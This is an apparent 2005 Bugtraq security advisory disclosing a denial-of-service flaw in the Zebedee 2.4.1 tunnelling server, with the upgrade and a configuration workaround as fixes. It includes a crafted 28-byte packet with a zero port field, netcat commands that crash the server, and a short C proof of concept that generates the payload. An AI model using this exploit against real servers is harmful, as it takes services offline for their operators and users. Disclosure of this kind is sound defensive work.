[40245] in bugtraq
Zebedee DoS Vulnerability
daemon@ATHENA.MIT.EDU (Shiraishi.M)
Fri Sep 9 15:53:49 2005
From: "Shiraishi.M" <shiraishi@insi.co.jp>
To: <bugtraq@securityfocus.com>
Cc: <shiraishi@insi.co.jp>
Date: Fri, 9 Sep 2005 14:21:36 +0900
Message-ID: <LMEKLIBMBJJDHMHLFLLOAEKNCDAA.shiraishi@insi.co.jp>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-2022-jp"
Content-Transfer-Encoding: 7bit
We have found a denial of service vulnerability in Zebedee.
This issue have been fixed in 2.4.1A.
[TESTED ON]
Zebedee 2.4.1 (Windows version and source compiled Linux version)
[VULNERABILITY]
The server crushes when "0" received as the port number in the
protocol option header.
$ od -tx1z -Ax zebedeeDoS
000000 02 01 00 00 20 00 00 06 00 00 00 80 ff ff ff ff >.... ...........<
000010 0b d8 30 b3 21 9c a6 74 00 00 00 00 >..0.!..t....<
00001c
The 9th and 10th byte of the header contains 0x00.
$ nc -vv -z -w2 zebedeehost 11965
zebedeehost [192.168.xxx.xxx] 11965 (?) open
sent 0, rcvd 0
$ nc -vv zebedeehost 11965 < zebedeeDoS
zebedeehost [192.168.xxx.xxx] 11965 (?) open
sent 28, rcvd 2
$ nc -vv -z -w2 zebedeehost 11965
zebedeehost [192.168.xxx.xxx] 11965 (?) : Connection refused
sent 0, rcvd 0
$
In the zebedee.c, please look at the function makeConnection() wich called
from server(),
1703 /* Sanity check */
1704
1705 assert(host != NULL && port != 0);
1706
Here, if the port number is "0", both sub and parent processes seemed to
quit running.
This issue occurs when the "allowed redirection port" not set(in default).
[SOLUTION]
1) Upgrading zebedee to 2.4.1A.
Or
2) Setting up allowed redirection ports will address this issue.
[SAMPLE EXPLOIT]
mkZebedeeDoS.c
/*
$ gcc -o mkZebedeeDoS mkZebedeeDoS.c
$ ./mkZebedeeDoS > zebedeeDoS
$ nc targethost port < zebedeeDoS
*/
#include <stdio.h>
int main (int argc, char **argv)
{
int i, size;
char data[] = {
0x02, 0x01, // protocol version
0x00, 0x00, // flags
0x20, 0x00, // max message size
0x00, 0x06, // compression info
0x00, 0x00, // port request: value = 0x0
0x00, 0x80, // key length
0xff, 0xff, 0xff, 0xff, // key token
0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74, // nonce value
0x00, 0x00, 0x00, 0x00 // target host address
};
size = 28;
for(i=0; i<size; i++){
printf("%c", data[i]);
}
return 0;
}
[DISCOVERED BY]
International Network Security, Inc.
Mitsuaki Shiraishi
Tomoki Sanaki
Mutallip Ablimit
-----------------
International Network Security, Inc.
Shiraishi.M
<shiraishi@insi.co.jp>
